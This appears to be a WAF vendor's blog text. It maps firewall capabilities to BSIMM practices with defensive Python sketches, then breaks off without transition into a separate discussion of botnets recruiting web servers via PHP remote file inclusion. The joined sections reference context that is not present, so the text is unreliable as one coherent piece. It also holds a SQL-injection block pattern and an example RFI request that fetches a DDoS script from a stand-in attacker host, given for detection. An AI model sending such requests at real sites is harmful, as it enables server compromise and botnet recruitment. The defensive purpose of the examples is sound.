I was recently asked by a prospect how a Web Application Firewall (WAF) fits into these security models, and I realized that this wasn't properly documented anywhere. Here are a few direct mappings that I came up with.

Deployment Phase

The main benefit of a WAF is that it is able to monitor the web application in real time, in production. This addresses some of the limitations of static application security testing (SAST) and dynamic application security testing (DAST) tools.

Specifically, items SE1.1 and SE2.3 specify the need to "watch software" in order to conduct application input monitoring and behavioral analysis. These are areas where a WAF's automated learning/profiling can identify deviations from normal user or application behavior.
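To make the learning/profiling idea concrete, here is a toy Python sketch (the class, the sample traffic, and the threshold are all invented for illustration): record the observed lengths of a parameter during a learning phase, then flag values that deviate sharply from that profile.

    import statistics

    class ParameterProfile:
        """Toy model of WAF profiling: learn a parameter's normal value lengths,
        then flag values that fall far outside the learned distribution."""

        def __init__(self):
            self.lengths = []

        def learn(self, value):
            self.lengths.append(len(value))

        def is_anomalous(self, value, threshold=3.0):
            mean = statistics.mean(self.lengths)
            stdev = statistics.pstdev(self.lengths) or 1.0  # guard against zero spread
            return abs(len(value) - mean) / stdev > threshold

    profile = ParameterProfile()
    for v in ["alice", "bob", "carol", "dave"]:  # normal values seen in learning mode
        profile.learn(v)
    print(profile.is_anomalous("a" * 500))       # True: looks like an overflow/injection attempt

A real WAF profiles far more than value length (character classes, data types, request rates), but the deviation-from-baseline logic is the same idea.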

This section highlights a number of critical deployment components where WAFs help an organization.

CMVM2.1 - Be able to fix apps when they are under direct attack

Being able to implement a quick response to mitigate a live attack is critical. Even if an organization has direct access to source code and developers, the process of getting fixes into production still takes a fair amount of time. WAFs can be used to quickly implement new policy settings to protect against these attacks until the source code fixes are live. Most people think of virtual patching here, but this capability also extends to other types of attacks, such as denial of service and brute force attacks.
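To illustrate virtual patching, here is a minimal Python/WSGI sketch, deliberately not written in any particular WAF's rule language; the /search endpoint, the q parameter, and the pattern are all hypothetical:

    import re
    from urllib.parse import parse_qs

    # Hypothetical scenario: /search is known to be vulnerable to SQL injection
    # via its "q" parameter, and the code fix has not shipped yet.
    BLOCK_PATTERN = re.compile(r"('|--|\bunion\b|\bselect\b)", re.IGNORECASE)

    def virtual_patch_middleware(app):
        """Reject requests matching the emergency rule until the real fix is live."""
        def wrapper(environ, start_response):
            if environ.get("PATH_INFO") == "/search":
                params = parse_qs(environ.get("QUERY_STRING", ""))
                for value in params.get("q", []):
                    if BLOCK_PATTERN.search(value):
                        start_response("403 Forbidden", [("Content-Type", "text/plain")])
                        return [b"Request blocked by virtual patch"]
            return app(environ, start_response)
        return wrapper

The point is the turnaround time: a rule like this can go live in minutes while the source code fix works its way through development, testing, and release.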

CMVM1.2 - Use ops data to change dev behavior

Being able to capture the full request/response payloads when either attacks or application errors are identified is vitally important. The fact is that most web server and application logging is terrible, recording only a small subset of the actual data. Most logs omit the full inbound request headers and body payloads, and almost none capture the outbound data. This data is critical, not only for incident response to identify what data was leaked, but also for remediation efforts. I mean c'mon, how can we really expect web application developers to properly correct application defects when all we give them is a one-line web server log entry in Common Log Format? That is simply not enough data for them to recreate the payloads and test a fix.
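As a rough Python/WSGI sketch of the kind of full-transaction capture a WAF provides (the middleware and the log-everything-that-isn't-a-2xx policy are assumptions for illustration):

    import logging
    from io import BytesIO

    audit_log = logging.getLogger("waf.audit")

    def full_audit_middleware(app):
        """Capture the complete request and response for non-2xx transactions."""
        def wrapper(environ, start_response):
            length = int(environ.get("CONTENT_LENGTH") or 0)
            body = environ["wsgi.input"].read(length)
            environ["wsgi.input"] = BytesIO(body)  # let the app re-read the body

            captured = {}
            def capturing_start_response(status, headers, exc_info=None):
                captured["status"] = status
                return start_response(status, headers, exc_info)

            chunks = list(app(environ, capturing_start_response))
            if not captured.get("status", "").startswith("2"):
                headers = {k: v for k, v in environ.items() if k.startswith("HTTP_")}
                audit_log.warning("request headers=%s body=%r response=%r",
                                  headers, body, b"".join(chunks))
            return chunks
        return wrapper

Compare the single warning line this emits (full headers, full request body, full response body) against a Common Log Format entry, and the remediation argument above makes itself.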

The other group that really benefits from the detailed logging produced by WAFs is Quality Assurance (QA). QA teams are in a great position in the SDLC to catch a large number of defects; however, they are typically not security folks, and their test cases focus almost exclusively on functional defects. We have seen tremendous benefit at organizations where WAF data captured in production is fed to the QA teams, who extract the malicious request data from the event reports and create new Abuse Cases for future application testing.
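A sketch of that QA workflow, assuming a hypothetical waf_events.jsonl export with one JSON object per line containing the attacked URL and the malicious payload: replay each captured payload as a regression test and assert the application rejects it cleanly.

    import json
    import unittest
    import urllib.error
    import urllib.request

    def load_abuse_cases(path):
        """Read captured WAF events, one JSON object per line."""
        with open(path) as f:
            return [json.loads(line) for line in f]

    class AbuseCaseTests(unittest.TestCase):
        def test_replayed_attacks_are_rejected(self):
            for case in load_abuse_cases("waf_events.jsonl"):
                req = urllib.request.Request(case["url"], data=case["payload"].encode())
                # The fixed application should refuse the payload, not 500 on it.
                with self.assertRaises(urllib.error.HTTPError) as ctx:
                    urllib.request.urlopen(req)
                self.assertIn(ctx.exception.code, (400, 403))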

ST3.4 - Drive testing depth

Application testing coverage is difficult. How can you ensure that your DAST tool has been able to enumerate and test a high percentage of your site's content? Another benefit of learning WAFs is that they are able to build a SITE profile tree of all dynamic resources (that is, excluding static resources such as images) and their parameters. It is therefore possible to export the WAF's SITE tree so that it may be reconciled against the DAST data. I have seen examples of this where the WAF identified various nooks and crannies deep within web applications that the automated tools just weren't able to reach on their own. Once the DAST tool is aware of the resource locations and injection points, it is much easier to test those resources properly.
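The reconciliation itself can be as simple as a set difference. A Python sketch, assuming both the WAF SITE tree and the DAST crawl can be exported as plain text with one resource path per line (the file names are hypothetical):

    def load_paths(path):
        with open(path) as f:
            return {line.strip() for line in f if line.strip()}

    waf_site_tree = load_paths("waf_site_tree.txt")  # dynamic resources seen in production
    dast_crawled = load_paths("dast_crawl.txt")      # resources the scanner actually reached

    # Resources real users exercised that the scanner never tested:
    for resource in sorted(waf_site_tree - dast_crawled):
        print("Untested resource:", resource)

Every path this prints is a candidate for manual review or for seeding the next DAST scan.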

Web servers are always online, whereas home computer systems are often shut down when not in use. This means that the number of botnet systems under control at any one time is variable. This factors into the botnet owner's service offerings, as they are often selling their botnet services, and having a reliable, strong botnet is key.

Web servers have more network bandwidth than home computer users. This is essentially a Quality of Service metric: commercial web servers are guaranteed specific amounts of network bandwidth, whereas home computer users typically have much less. Additionally, home user network traffic is often throttled, which makes their DDoS attack traffic less effective.

Web servers have more horsepower than home computers. The number of CPUs, the amount of RAM, and so on mean that commercial servers can generate much more DDoS network traffic than home computer systems.

Web servers are less likely to be blacklisted by ISPs than home computer systems. This means that web server botnet zombies will stay online, sending traffic much longer than home computers.

While the information presented by the media is interesting, it is by no means a new tactic.

How do I know this? Because we (Breach Security) reported on this exact same concept two years ago in our WASC Web Hacking Incident Database Annual Report Presentation Slides. What we showed was that botnet operators have been using PHP Remote File Inclusion (RFI) attacks to exploit web servers and download DDoS client code, forcing these systems to participate in DDoS attacks. RFI attacks are still a big problem, and a surprising number of sites are still vulnerable even though newer versions of PHP ship with a more secure default configuration that prevents this exploit from working. As with other types of software, organizations are simply not able to upgrade to the newest versions that fix the flaws in a timely manner.

The OWASP Top Ten 2010 release candidate gives the rationale for dropping this category:

REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.

While I don't disagree with some of this rationale, the fact is that there are still many, many sites vulnerable to RFI attacks, and recruiting a compromised web site into a botnet army is just one of the possible bad outcomes...
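For anyone who wants to look for RFI attempts in their own access logs, here is an illustrative Python sketch. The heuristic (a parameter value that is itself a full remote URL) is intentionally simplistic and is an assumption, not a complete detection rule:

    import re
    from urllib.parse import parse_qs, urlsplit

    # A typical RFI attempt passes a remote URL as a parameter value, e.g.:
    #   GET /index.php?page=http://evil.example/ddos.txt? HTTP/1.1
    REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

    def find_rfi_attempts(request_line):
        """Return (parameter, value) pairs whose values look like remote URLs."""
        query = urlsplit(request_line.split()[1]).query
        return [(name, value)
                for name, values in parse_qs(query).items()
                for value in values
                if REMOTE_URL.match(value)]

    print(find_rfi_attempts("GET /index.php?page=http://evil.example/ddos.txt? HTTP/1.1"))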